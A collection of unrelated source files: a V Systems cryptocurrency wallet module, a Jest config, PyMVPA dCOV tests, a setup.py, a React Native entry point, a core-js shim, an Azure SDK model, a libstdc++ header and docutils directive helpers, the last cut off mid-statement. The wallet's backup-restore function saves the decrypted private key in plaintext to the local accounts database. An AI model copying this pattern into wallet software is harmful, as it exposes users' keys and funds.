                    triplesec.decrypt({
                        data: new triplesec.Buffer(account.encrypted_private_key, "hex"),
                        key: new triplesec.Buffer(password)
                    }, function (error, buffer) {
                        if(!error) {
                            account.private_key = buffer.toString();
                            // Copy only the known fields into the session
                            // object (drops any stray doc metadata).
                            logged_account = {
                                name: account.name,
                                address: account.address,
                                public_key: account.public_key,
                                private_key: account.private_key,
                                encrypted_private_key: account.encrypted_private_key
                            };
                            callback_function(logged_account);
                        }else {
                            callback_function(null);
                        }
                    });
                }
            }
        }
        get_accounts(accounts_callback_function);
    }else {
        callback_function(null);
    }
}
// Restore an account from an exported backup object: decrypt its private
// key with `password`, verify the key actually matches the backup's public
// key, then store the account and log it in. `callback_function` receives
// the logged account or null on decryption/verification failure.
function login_from_backup(account = "", password = "", callback_function) {
    // NOTE: this inner parameter shadows the outer `account` argument; both
    // refer to the same backup object at the single call site below.
    function compare_private_public_key(account) {
        // Create new account by private key — regenerating the keypair
        // proves the decrypted key belongs to the claimed public key.
        let account_from_pk = new vsys.Account(network_byte);
        account_from_pk.buildFromPrivateKey(account.private_key);
        if(account_from_pk.public_key == account.public_key) {
            // Push account in DB
            const new_account = {
                address: account.address,
                public_key: account.public_key,
                encrypted_private_key: account.encrypted_private_key
            };
            try {
                accounts_db.put({
                    _id: new_account.address,
                    data: JSON.stringify(account),
                    timestamp: Date.now(),
                });
            } catch (error) {
                // Best-effort: the account may already exist in the DB;
                // restoring the session still proceeds.
            }
            logged_account = {
                name: account.name,
                address: account.address,
                public_key: account.public_key,
                private_key: account.private_key,
                encrypted_private_key: account.encrypted_private_key
            };
            callback_function(logged_account);
        }else {
            callback_function(null);
        }
    }
    // Decrypt private key
    triplesec.decrypt({
        data: new triplesec.Buffer(account.encrypted_private_key, "hex"),
        key: new triplesec.Buffer(password)
    }, function (error, buffer) {
        if(!error) {
            account.private_key = buffer.toString();
            compare_private_public_key(account);
        }else {
            callback_function(null);
        }
    });
}
// Drop the in-memory session. The `address` argument is accepted for API
// symmetry with the other account functions but is not used.
function logout(address = "", callback_function = function(){}) {
    logged_account = null;
    callback_function(null);
}
// Remove every account document from the accounts DB.
// `callback_function` receives true once all removals have completed, or
// null on failure (matching the module's error convention).
function delete_accounts(callback_function) {
    accounts_db.allDocs().then(function (result) {
        // Fix: wait for every removal before reporting success; the
        // original resolved immediately after issuing them.
        return Promise.all(result.rows.map(function (row) {
            return accounts_db.remove(row.id, row.value.rev);
        }));
    }).then(function () {
        callback_function(true);
    }).catch(function (err) {
        // Fix: the original handler referenced an undefined `error`
        // variable, so the catch itself threw a ReferenceError.
        callback_function(null);
    });
}
// Return (via callback) the formatted balance for `address`, using a short
// local cache so rapid UI refreshes don't hammer the node. Offline, any
// cached value is served regardless of age. On network failure the callback
// receives null.
function get_balance(address = "", callback_function) {
    const query_id = "get_balance_" + address;
    // Cache TTL: 1 second.
    const cache_time = 1 * 1000;
    query_db.get(query_id, function(err, doc) {
        if (!err) {
            // Test if recent (or the browser is offline — then serve stale)
            if(doc.timestamp + cache_time >= Date.now() || !navigator.onLine) {
                callback_function(doc.balance);
            }else { // if old update
                chain.getBalance(address).then(response => {
                    const formatted_balance = _format_amount(response.balance);
                    // Overwrite the cached doc in place (_id/_rev reused).
                    query_db.put({
                        _id: doc._id,
                        _rev: doc._rev,
                        timestamp: Date.now(),
                        balance: formatted_balance
                    });
                    callback_function(formatted_balance);
                }, respError => {
                    callback_function(null);
                });
            }
        }else {
            // Cache miss: get data from network and seed the cache.
            chain.getBalance(address).then(response => {
                const formatted_balance = _format_amount(response.balance);
                query_db.put({
                    _id: query_id,
                    timestamp: Date.now(),
                    balance: formatted_balance
                });
                callback_function(formatted_balance);
            }, respError => {
                callback_function(null);
            });
        }
    });
}
// Return (via callback) the formatted transaction list for `address`, with
// the same 1-second cache / offline-stale strategy as get_balance. The cache
// key includes paging parameters so each page is cached independently.
// The callback receives an array of formatted transactions or null.
function get_transactions(address = "", number_of_record = 0, offset = 0, callback_function) {
    const query_id = "get_transactions_" + address + "_" + number_of_record + "_" + offset;
    // Cache TTL: 1 second.
    const cache_time = 1 * 1000;
    query_db.get(query_id, function(err, doc) {
        if (!err) {
            // Test if recent (or offline — then serve stale)
            if(doc.timestamp + cache_time >= Date.now() || !navigator.onLine) {
                const formated_transactions = clean_json_text(doc.transactions);
                callback_function(JSON.parse(formated_transactions));
            }else { // if old update
                chain.getTxByType(address, number_of_record, TX_TYPE, offset).then(response => {
                    if(typeof response["transactions"] !== "undefined") {
                        const formated_transactions = response["transactions"].map(transaction => _format_transaction(transaction));
                        // Overwrite the cached doc in place (_id/_rev reused).
                        query_db.put({
                            _id: doc._id,
                            _rev: doc._rev,
                            timestamp: Date.now(),
                            transactions: JSON.stringify(formated_transactions)
                        });
                        callback_function(formated_transactions);
                    }else {
                        callback_function(null);
                    }
                }, respError => {
                    callback_function(null);
                });
            }
        }else {
            // Cache miss: get data from network and seed the cache.
            chain.getTxByType(address, number_of_record, TX_TYPE, offset).then(response => {
                if(typeof response["transactions"] !== "undefined") {
                    const formated_transactions = response["transactions"].map(transaction => _format_transaction(transaction));
                    query_db.put({
                        _id: query_id,
                        timestamp: Date.now(),
                        transactions: JSON.stringify(formated_transactions)
                    });
                    callback_function(formated_transactions);
                }else {
                    callback_function(null);
                }
            }, respError => {
                callback_function(null);
            });
        }
    });
}
// Build, sign and broadcast a payment transaction from the account owning
// `private_key` to `address`. `callback_function` receives the node's
// response, or null when broadcasting fails.
function send_transaction(private_key, address, amount, memo, callback_function) {
    const payment_tx = new vsys.Transaction(network_byte);
    const sender = new vsys.Account(network_byte);
    sender.buildFromPrivateKey(private_key);
    const sender_public_key = sender.getPublicKey();
    // Date.now() scaled by 1e6 — presumably the node expects nanoseconds.
    const tx_timestamp = Date.now() * 1e6;
    payment_tx.buildPaymentTx(sender_public_key, address, amount, memo, tx_timestamp);
    const tx_signature = sender.getSignature(payment_tx.toBytes());
    const signed_payload = payment_tx.toJsonForSendingTx(tx_signature);
    sender.sendTransaction(chain, signed_payload).then(function(response) {
        callback_function(response);
    }, function(respError) {
        callback_function(null);
    });
}
// Return (via callback) the current fiat exchange rates for the coin, from
// the CoinGecko simple-price API, cached locally for one minute. Offline,
// any cached value is served regardless of age.
function get_currencies_change(callback_function) {
    const query_id = "get_currencies_change";
    // Cache TTL: 60 seconds (rates change slowly; also respects API limits).
    const cache_time = 60 * 1000;
    const crypto_id = "v-systems";
    const currencies_string = CURRENCIES.join(",");
    const url="https://api.coingecko.com/api/v3/simple/price?ids=" + crypto_id + "&vs_currencies=" + currencies_string;
    query_db.get(query_id, function(err, doc) {
        if (!err) {
            // Test if recent (or offline — then serve stale)
            if(doc.timestamp + cache_time >= Date.now() || !navigator.onLine) {
                const currencies_change = clean_json_text(doc.change);
                callback_function(JSON.parse(currencies_change));
            }else { // if old update
                _loadJSON(url, function (response) {
                    const currencies_change = response[crypto_id];
                    // Overwrite the cached doc (_rev from the stale doc).
                    query_db.put({
                        _id: query_id,
                        _rev: doc._rev,
                        timestamp: Date.now(),
                        change: JSON.stringify(currencies_change)
                    });
                    callback_function(currencies_change);
                });
            }
        }else {
            // Cache miss: get data from network and seed the cache.
            _loadJSON(url, function (response) {
                const currencies_change = response[crypto_id];
                query_db.put({
                    _id: query_id,
                    timestamp: Date.now(),
                    change: JSON.stringify(currencies_change)
                });
                callback_function(currencies_change);
            });
        }
    });
}
module.exports = {
get_settings: get_settings,
set_settings: set_settings,
create_account: create_account,
get_accounts: get_accounts,
login: login,
is_logged: is_logged,
login_from_backup: login_from_backup,
change_password: change_password,
delete_accounts: delete_accounts,
logout: logout,
get_balance: get_balance,
get_transactions: get_transactions,
send_transaction: send_transaction,
get_currencies_change: get_currencies_change
};
|
// Jest configuration: TypeScript sources under src/, compiled on the fly by
// ts-jest, with coverage collection always on.
module.exports = {
    roots: ['<rootDir>/src'],
    collectCoverage: true,
    coverageDirectory: "coverage/",
    // Fail tests that rely on deprecated Jest APIs.
    errorOnDeprecated: true,
    transform: {
        '^.+\\.ts$': 'ts-jest',
    },
    testEnvironment: "node",
    // Only *.test.ts files are treated as test suites.
    testRegex: '.*\\.test.ts?$',
    // Never pick up tests from dependencies or build output.
    testPathIgnorePatterns: [
        '<rootDir>/node_modules',
        '<rootDir>/lib',
    ]
}
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the PyMVPA package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Unit tests for dCOV and associated functions"""
from mvpa2.testing import *
# For testing
from nose.tools import ok_
from numpy.testing import assert_array_almost_equal
from mvpa2.testing.datasets import get_random_rotation
from mvpa2.misc.dcov import _euclidean_distances, dCOV, dcorcoef
from mvpa2.base import externals
if externals.exists('cran-energy'):
from mvpa2.misc.dcov import dCOV_R
@reseed_rng()
def test_euclidean_distances():
    """Check _euclidean_distances(uv=True) against a brute-force reference."""
    data = np.random.normal(size=(4, 10)) + np.random.normal() * 10
    computed = _euclidean_distances(data, uv=True)
    # trust no one! Rebuild the per-feature distance cube by hand, using the
    # same sqrt-of-square formula so float results match bit-for-bit.
    reference = np.zeros((4, 10, 10))
    for col_i, sample_i in enumerate(data.T):
        for col_j, sample_j in enumerate(data.T):
            reference[:, col_i, col_j] = np.sqrt((sample_i - sample_j) ** 2)
    assert_array_equal(computed, reference)
def test_dCOV_against_R_energy():
    """Cross-validate the Python dCOV against the R 'energy' package.

    Skipped unless rpy2 access to CRAN's energy package is available.
    (Python 2 module: uses ``xrange``.)
    """
    skip_if_no_external('cran-energy')
    for N in xrange(1, 10): # sweep through size of the first data
        # We will compare to R implementation
        M, T = 4, 30
        x = np.random.normal(size=(N, T)) + np.random.normal() * 10
        R = np.random.normal(size=(N, M))
        # y is a noisy affine transform of x, so dependence is guaranteed.
        y = 10 * np.dot(R.T, x) + np.random.normal(size=(M, T)) \
            + np.random.normal(size=(M,))[:, None] # offset
        # To assure that works for not all_est
        pdCovs = dCOV(x, y, all_est=False)
        dCovs = dCOV_R(x, y, all_est=False)
        assert_array_almost_equal(pdCovs, dCovs)
        # Exercise both univariate and multivariate code paths.
        for uv in True, False:
            for out, outp in zip(dCOV_R(x, y, uv=uv),
                                 dCOV(x, y, uv=uv)):
                assert_array_almost_equal(out, outp)
@labile(5, 1)
def test_dCOV():
    """Sanity checks of dCOV/dCor behavior on dependent, independent and
    identical data.  Marked @labile since thresholds are stochastic.
    (Python 2 module: uses ``xrange``.)
    """
    # Few simple tests to verify that the measure seems to be ok
    for N in xrange(1, 10): # sweep through size of the first data
        # We will compare to R implementation
        M, T = 4, 100
        x = np.random.normal(size=(N, T)) + np.random.normal() * 10
        R = np.random.normal(size=(N, M))
        # linearly dependent variable after rotation
        dCov, dCor, _, _ = dCOV(x, 10 * np.dot(R.T, x))
        ok_(dCor > 0.7) # should be really high but might fluctuate
        # completely independent variable
        dCov, dCor, _, _ = dCOV(x, np.random.normal(size=x.shape))
        # more dimension in x -- more uncertainty that they are
        # independent below is a heuristic (for T=100) and we should
        # just implement proper bootstrap significance estimation for
        # dCor
        ok_(dCor < 0.2 + N / 2.0) # should be really high but might fluctuate
        # the same variable -- things should match for dCov and dVar's
        dCov, dCor, dVarx, dVary = dCOV(x, x)
        assert_equal(dCov, dVarx)
        assert_equal(dCov, dVary)
        assert_equal(dCor, 1.)
        assert_equal(dcorcoef(x, x), 1)
        #+ np.random.normal(size=(M, T)) \
        #    + np.random.normal(size=(M,))[:, None] # offset
        # Test that would work on vectors (1-D inputs, not just matrices)
        dCov, dCor, dVarx, dVary = dCOV(np.arange(N), np.sin(np.arange(N) / 3.))
        if N > 1:
            ok_(dCor > 0.6) # should be really high but might fluctuate
        assert_equal(dcorcoef(np.arange(N), np.sin(np.arange(N) / 3.)), dCor)
|
#!/usr/bin/env python
#
# Copyright (c) Bo Peng and the University of Texas MD Anderson Cancer Center
# Distributed under the terms of the 3-clause BSD License.
from setuptools import find_packages, setup
# obtain version of SoS without importing the package (importing could pull
# in heavy runtime dependencies at build time)
import ast

with open('src/sos_stata/_version.py') as version:
    for line in version:
        if line.startswith('__version__'):
            # ast.literal_eval only accepts literal expressions, unlike the
            # original eval() which would execute arbitrary code from the file.
            __version__ = ast.literal_eval(line.split('=')[1].strip())
            break
# Package metadata for the sos-stata SoS Notebook language extension.
setup(name = "sos-stata",
    version = __version__,
    description = 'SoS Notebook extension for Stata',
    author = 'Bo Peng',
    url = 'https://github.com/vatlab/sos-stata',
    author_email = 'bpeng@mdanderson.org',
    maintainer = 'Bo Peng',
    maintainer_email = 'bpeng@mdanderson.org',
    license = '3-clause BSD',
    include_package_data = True,
    classifiers = [
        'Development Status :: 4 - Beta',
        'Environment :: Console',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Operating System :: POSIX :: Linux',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: Microsoft :: Windows',
        'Intended Audience :: Information Technology',
        'Intended Audience :: Science/Research',
        'Programming Language :: Python :: 3 :: Only',
        'Programming Language :: Python :: Implementation :: CPython',
        ],
    packages = find_packages('src'),
    package_dir = {'': 'src'},
    install_requires=[
          'sos>=0.18.0',
          'sos-notebook>=0.18.0'
      ],
    # Registers the Stata kernel with SoS Notebook via its plugin mechanism.
    entry_points= '''
[sos_languages]
Stata = sos_stata.kernel:sos_stata
'''
)
|
import {Provider} from 'react-redux';
import store from './src/redux/store';
import AppViewContainer from './src/modules/AppViewContainer';
import React, {Component} from 'react';
import {AppRegistry, BackAndroid} from 'react-native';
import {NavigationActions} from 'react-navigation';
class flapjacks extends Component {
componentWillMount() {
BackAndroid.addEventListener('hardwareBackPress', this.navigateBack);
}
navigateBack() {
const navigatorState = store.getState().get('navigatorState');
const currentStackScreen = navigatorState.get('index');
const currentTab = navigatorState.getIn(['routes', 0, 'index']);
if (currentTab !== 0 || currentStackScreen !== 0) {
store.dispatch(NavigationActions.back());
return true;
}
// otherwise let OS handle the back button action
return false;
}
render() {
return (
<Provider store={store}>
<AppViewContainer />
</Provider>
);
}
}
// Register the root component with React Native's app registry.
AppRegistry.registerComponent('flapjacks', () => flapjacks);
|
// Reflect.hasOwnMetadata(metadataKey, target [, targetKey])
// Checks only metadata defined directly on `target` ("own" metadata), unlike
// Reflect.hasMetadata which also walks the prototype chain.
var metadata = require('./_metadata')
  , anObject = require('./_an-object')
  , ordinaryHasOwnMetadata = metadata.has
  , toMetaKey = metadata.key;
metadata.exp({hasOwnMetadata: function hasOwnMetadata(metadataKey, target /*, targetKey */){
  // anObject throws TypeError for non-object targets, per the spec.
  return ordinaryHasOwnMetadata(metadataKey, anObject(target)
    , arguments.length < 3 ? undefined : toMetaKey(arguments[2]));
}});
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
# NOTE: AutoRest-generated model — keep edits to comments only; logic changes
# will be lost on regeneration.
class OSDisk(Model):
    """Specifies information about the operating system disk used by the virtual
    machine. <br><br> For more information about disks, see [About disks and
    VHDs for Azure virtual
    machines](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-about-disks-vhds?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json).
    All required parameters must be populated in order to send to Azure.
    :param os_type: This property allows you to specify the type of the OS
     that is included in the disk if creating a VM from user-image or a
     specialized VHD. <br><br> Possible values are: <br><br> **Windows**
     <br><br> **Linux**. Possible values include: 'Windows', 'Linux'
    :type os_type: str or
     ~azure.mgmt.compute.v2016_04_30_preview.models.OperatingSystemTypes
    :param encryption_settings: Specifies the encryption settings for the OS
     Disk. <br><br> Minimum api-version: 2015-06-15
    :type encryption_settings:
     ~azure.mgmt.compute.v2016_04_30_preview.models.DiskEncryptionSettings
    :param name: The disk name.
    :type name: str
    :param vhd: The virtual hard disk.
    :type vhd: ~azure.mgmt.compute.v2016_04_30_preview.models.VirtualHardDisk
    :param image: The source user image virtual hard disk. The virtual hard
     disk will be copied before being attached to the virtual machine. If
     SourceImage is provided, the destination virtual hard drive must not
     exist.
    :type image:
     ~azure.mgmt.compute.v2016_04_30_preview.models.VirtualHardDisk
    :param caching: Specifies the caching requirements. <br><br> Possible
     values are: <br><br> **None** <br><br> **ReadOnly** <br><br> **ReadWrite**
     <br><br> Default: **None for Standard storage. ReadOnly for Premium
     storage**. Possible values include: 'None', 'ReadOnly', 'ReadWrite'
    :type caching: str or
     ~azure.mgmt.compute.v2016_04_30_preview.models.CachingTypes
    :param create_option: Required. Specifies how the virtual machine should
     be created.<br><br> Possible values are:<br><br> **Attach** \\u2013 This
     value is used when you are using a specialized disk to create the virtual
     machine.<br><br> **FromImage** \\u2013 This value is used when you are
     using an image to create the virtual machine. If you are using a platform
     image, you also use the imageReference element described above. If you are
     using a marketplace image, you also use the plan element previously
     described. Possible values include: 'FromImage', 'Empty', 'Attach'
    :type create_option: str or
     ~azure.mgmt.compute.v2016_04_30_preview.models.DiskCreateOptionTypes
    :param disk_size_gb: Specifies the size of an empty data disk in
     gigabytes. This element can be used to overwrite the size of the disk in a
     virtual machine image. <br><br> This value cannot be larger than 1023 GB
    :type disk_size_gb: int
    :param managed_disk: The managed disk parameters.
    :type managed_disk:
     ~azure.mgmt.compute.v2016_04_30_preview.models.ManagedDiskParameters
    """

    # Fields the msrest serializer enforces before sending to Azure.
    _validation = {
        'create_option': {'required': True},
    }

    # Maps Python attribute names to their REST wire names and msrest types.
    _attribute_map = {
        'os_type': {'key': 'osType', 'type': 'OperatingSystemTypes'},
        'encryption_settings': {'key': 'encryptionSettings', 'type': 'DiskEncryptionSettings'},
        'name': {'key': 'name', 'type': 'str'},
        'vhd': {'key': 'vhd', 'type': 'VirtualHardDisk'},
        'image': {'key': 'image', 'type': 'VirtualHardDisk'},
        'caching': {'key': 'caching', 'type': 'CachingTypes'},
        'create_option': {'key': 'createOption', 'type': 'DiskCreateOptionTypes'},
        'disk_size_gb': {'key': 'diskSizeGB', 'type': 'int'},
        'managed_disk': {'key': 'managedDisk', 'type': 'ManagedDiskParameters'},
    }

    def __init__(self, *, create_option, os_type=None, encryption_settings=None, name: str=None, vhd=None, image=None, caching=None, disk_size_gb: int=None, managed_disk=None, **kwargs) -> None:
        # create_option is the only required field (see _validation).
        super(OSDisk, self).__init__(**kwargs)
        self.os_type = os_type
        self.encryption_settings = encryption_settings
        self.name = name
        self.vhd = vhd
        self.image = image
        self.caching = caching
        self.create_option = create_option
        self.disk_size_gb = disk_size_gb
        self.managed_disk = managed_disk
|
// Base to std::allocator -*- C++ -*-
// Copyright (C) 2004-2020 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 3, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file bits/c++allocator.h
* This is an internal header file, included by other library headers.
* Do not attempt to use it directly. @headername{memory}
*/
#ifndef _GLIBCXX_CXX_ALLOCATOR_H
#define _GLIBCXX_CXX_ALLOCATOR_H 1

#include <ext/pool_allocator.h>

#if __cplusplus >= 201103L
namespace std
{
  /**
   *  @brief  An alias to the base class for std::allocator.
   *  @ingroup allocators
   *
   *  Used to set the std::allocator base class to
   *  __gnu_cxx::__pool_alloc.
   *
   *  @tparam  _Tp  Type of allocated object.
   */
  template<typename _Tp>
    using __allocator_base = __gnu_cxx::__pool_alloc<_Tp>;
}
#else
// Define __pool_alloc as the base class to std::allocator.
// (Pre-C++11 has no alias templates, so a macro is used instead.)
# define __allocator_base  __gnu_cxx::__pool_alloc
#endif

#endif
|
# Author: David Goodger
# Contact: goodger@python.org
# Revision: $Revision: 4229 $
# Date: $Date: 2005-12-23 00:46:16 +0100 (Fri, 23 Dec 2005) $
# Copyright: This module has been placed in the public domain.
"""
This package contains directive implementation modules.
The interface for directive functions is as follows::
def directive_fn(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
code...
# Set function attributes:
directive_fn.arguments = ...
directive_fn.options = ...
    directive_fn.content = ...
Parameters:
- ``name`` is the directive type or name (string).
- ``arguments`` is a list of positional arguments (strings).
- ``options`` is a dictionary mapping option names (strings) to values (type
depends on option conversion functions; see below).
- ``content`` is a list of strings, the directive content.
- ``lineno`` is the line number of the first line of the directive.
- ``content_offset`` is the line offset of the first line of the content from
the beginning of the current input. Used when initiating a nested parse.
- ``block_text`` is a string containing the entire directive. Include it as
the content of a literal block in a system message if there is a problem.
- ``state`` is the state which called the directive function.
- ``state_machine`` is the state machine which controls the state which called
the directive function.
Function attributes, interpreted by the directive parser (which calls the
directive function):
- ``arguments``: A 3-tuple specifying the expected positional arguments, or
``None`` if the directive has no arguments. The 3 items in the tuple are
``(required, optional, whitespace OK in last argument)``:
1. The number of required arguments.
2. The number of optional arguments.
3. A boolean, indicating if the final argument may contain whitespace.
Arguments are normally single whitespace-separated words. The final
argument may contain whitespace if the third item in the argument spec tuple
is 1/True. If the form of the arguments is more complex, specify only one
argument (either required or optional) and indicate that final whitespace is
OK; the client code must do any context-sensitive parsing.
- ``options``: A dictionary, mapping known option names to conversion
functions such as `int` or `float`. ``None`` or an empty dict implies no
options to parse. Several directive option conversion functions are defined
in this module.
Option conversion functions take a single parameter, the option argument (a
string or ``None``), validate it and/or convert it to the appropriate form.
Conversion functions may raise ``ValueError`` and ``TypeError`` exceptions.
- ``content``: A boolean; true if content is allowed. Client code must handle
the case where content is required but not supplied (an empty content list
will be supplied).
Directive functions return a list of nodes which will be inserted into the
document tree at the point where the directive was encountered (can be an
empty list).
See `Creating reStructuredText Directives`_ for more information.
.. _Creating reStructuredText Directives:
http://docutils.sourceforge.net/docs/howto/rst-directives.html
"""
__docformat__ = 'reStructuredText'
import re
import codecs
from docutils import nodes
from docutils.parsers.rst.languages import en as _fallback_language_module
_directive_registry = {
'attention': ('admonitions', 'attention'),
'caution': ('admonitions', 'caution'),
'danger': ('admonitions', 'danger'),
'error': ('admonitions', 'error'),
'important': ('admonitions', 'important'),
'note': ('admonitions', 'note'),
'tip': ('admonitions', 'tip'),
'hint': ('admonitions', 'hint'),
'warning': ('admonitions', 'warning'),
'admonition': ('admonitions', 'admonition'),
'sidebar': ('body', 'sidebar'),
'topic': ('body', 'topic'),
'line-block': ('body', 'line_block'),
'parsed-literal': ('body', 'parsed_literal'),
'rubric': ('body', 'rubric'),
'epigraph': ('body', 'epigraph'),
'highlights': ('body', 'highlights'),
'pull-quote': ('body', 'pull_quote'),
'compound': ('body', 'compound'),
'container': ('body', 'container'),
#'questions': ('body', 'question_list'),
'table': ('tables', 'table'),
'csv-table': ('tables', 'csv_table'),
'list-table': ('tables', 'list_table'),
'image': ('images', 'image'),
'figure': ('images', 'figure'),
'contents': ('parts', 'contents'),
'sectnum': ('parts', 'sectnum'),
'header': ('parts', 'header'),
'footer': ('parts', 'footer'),
#'footnotes': ('parts', 'footnotes'),
#'citations': ('parts', 'citations'),
'target-notes': ('references', 'target_notes'),
'meta': ('html', 'meta'),
#'imagemap': ('html', 'imagemap'),
'raw': ('misc', 'raw'),
'include': ('misc', 'include'),
'replace': ('misc', 'replace'),
'unicode': ('misc', 'unicode_directive'),
'class': ('misc', 'class_directive'),
'role': ('misc', 'role'),
'default-role': ('misc', 'default_role'),
'title': ('misc', 'title'),
'date': ('misc', 'date'),
'restructuredtext-test-directive': ('misc', 'directive_test_function'),}
"""Mapping of directive name to (module name, function name). The directive
name is canonical & must be lowercase. Language-dependent names are defined
in the ``language`` subpackage."""
_modules = {}
"""Cache of imported directive modules."""
_directives = {}
"""Cache of imported directive functions."""
def directive(directive_name, language_module, document):
    """
    Locate and return a directive function from its language-dependent name.
    If not found in the current language, check English.  Return None if the
    named directive cannot be found.

    Returns a ``(function_or_None, system_messages)`` pair; any lookup
    problems are reported as docutils system messages, not exceptions.
    (Python 2 module: uses ``dict.has_key`` and old ``except X, e`` syntax.)
    """
    normname = directive_name.lower()
    messages = []
    msg_text = []
    # Fast path: directive function already resolved and cached.
    if _directives.has_key(normname):
        return _directives[normname], messages
    canonicalname = None
    try:
        # Translate the language-dependent name to the canonical English one.
        canonicalname = language_module.directives[normname]
    except AttributeError, error:
        msg_text.append('Problem retrieving directive entry from language '
                        'module %r: %s.' % (language_module, error))
    except KeyError:
        msg_text.append('No directive entry for "%s" in module "%s".'
                        % (directive_name, language_module.__name__))
    if not canonicalname:
        try:
            # Fall back to the English language module.
            canonicalname = _fallback_language_module.directives[normname]
            msg_text.append('Using English fallback for directive "%s".'
                            % directive_name)
        except KeyError:
            msg_text.append('Trying "%s" as canonical directive name.'
                            % directive_name)
            # The canonical name should be an English name, but just in case:
            canonicalname = normname
    if msg_text:
        message = document.reporter.info(
            '\n'.join(msg_text), line=document.current_line)
        messages.append(message)
    try:
        modulename, functionname = _directive_registry[canonicalname]
    except KeyError:
        # Error handling done by caller.
        return None, messages
    # Import (or fetch from cache) the module implementing the directive.
    if _modules.has_key(modulename):
        module = _modules[modulename]
    else:
        try:
            module = __import__(modulename, globals(), locals())
        except ImportError, detail:
            messages.append(document.reporter.error(
                'Error importing directive module "%s" (directive "%s"):\n%s'
                % (modulename, directive_name, detail),
                line=document.current_line))
            return None, messages
    try:
        function = getattr(module, functionname)
        # Cache under the normalized (possibly language-specific) name.
        _directives[normname] = function
    except AttributeError:
        messages.append(document.reporter.error(
            'No function "%s" in module "%s" (directive "%s").'
            % (functionname, modulename, directive_name),
            line=document.current_line))
        return None, messages
    return function, messages
def register_directive(name, directive_function):
    """
    Register a nonstandard application-defined directive function.
    Language lookups are not needed for such functions.
    """
    # NOTE: ``name`` is stored as given; callers should supply the
    # lowercase canonical name, because lookups in directive() lowercase
    # the requested name before consulting this cache.
    _directives[name] = directive_function
def flag(argument):
    """
    Check for a valid flag option (no argument) and return ``None``.
    (Directive option conversion function.)

    Raise ``ValueError`` if an argument is found.
    """
    # A flag takes no argument: None, '', or pure whitespace are all fine.
    if not argument or not argument.strip():
        return None
    raise ValueError('no argument is allowed; "%s" supplied' % argument)
def unchanged_required(argument):
    """
    Return the argument text, unchanged.
    (Directive option conversion function.)

    Raise ``ValueError`` if no argument is found.
    """
    if argument is None:
        raise ValueError('argument required but none supplied')
    return argument  # returned verbatim
def unchanged(argument):
    """
    Return the argument text, unchanged.
    (Directive option conversion function.)

    No argument implies empty string ("").
    """
    return u'' if argument is None else argument
def path(argument):
    """
    Return the path argument unwrapped (with newlines removed).
    (Directive option conversion function.)

    Raise ``ValueError`` if no argument is found.
    """
    if argument is None:
        raise ValueError('argument required but none supplied')
    # Re-join a possibly line-wrapped path, stripping per-line whitespace.
    return ''.join(line.strip() for line in argument.splitlines())
def uri(argument):
    """
    Return the URI argument with whitespace removed.
    (Directive option conversion function.)

    Raise ``ValueError`` if no argument is found.
    """
    if argument is None:
        raise ValueError('argument required but none supplied')
    # split() with no separator drops ALL whitespace (spaces, newlines, tabs).
    return ''.join(argument.split())
def nonnegative_int(argument):
    """
    Check for a nonnegative integer argument; raise ``ValueError`` if not.
    (Directive option conversion function.)
    """
    value = int(argument)
    if value >= 0:
        return value
    raise ValueError('negative value; must be positive or zero')
# CSS-style length units accepted by get_measure() and its wrappers below.
length_units = ['em', 'ex', 'px', 'in', 'cm', 'mm', 'pt', 'pc']
def get_measure(argument, units):
    """
    Check for a positive argument of one of the units and return a
    normalized string of the form "<value><unit>" (without space in
    between).

    To be called from directive option conversion functions.

    Raise ``ValueError`` if the argument is not ``<number><unit>`` with
    a unit from ``units``.
    """
    # Bug fix: the original used ``assert`` to validate the match, which
    # is stripped under ``python -O`` and would then crash with an
    # uncaught AttributeError instead of raising ValueError.
    error = ValueError(
        'not a positive measure of one of the following units:\n%s'
        % ' '.join(['"%s"' % i for i in units]))
    match = re.match(r'^([0-9.]+) *(%s)$' % '|'.join(units), argument)
    if match is None:
        raise error
    try:
        float(match.group(1))  # rejects malformed numbers like "1.2.3"
    except ValueError:
        raise error
    return match.group(1) + match.group(2)
def length_or_unitless(argument):
    # Accept any standard length unit, or a bare (unitless) number.
    return get_measure(argument, length_units + [''])
def length_or_percentage_or_unitless(argument):
    # Accept any standard length unit, a percentage, or a bare number.
    return get_measure(argument, length_units + ['%', ''])
def class_option(argument):
    """
    Convert the argument into a list of ID-compatible strings and return it.
    (Directive option conversion function.)

    Raise ``ValueError`` if no argument is found.
    """
    if argument is None:
        raise ValueError('argument required but none supplied')
    class_names = []
    for raw_name in argument.split():
        # nodes.make_id normalizes the token into an ID-compatible string;
        # an empty result means the token had no usable characters.
        normalized = nodes.make_id(raw_name)
        if not normalized:
            raise ValueError('cannot make "%s" into a class name' % raw_name)
        class_names.append(normalized)
    return class_names
# Matches hex character codes with '0x', 'x', '\x', 'U+', 'u', or '\u'
# prefixes, or XML-style numeric entities ('&#x...;'); case-insensitive.
unicode_pattern = re.compile(
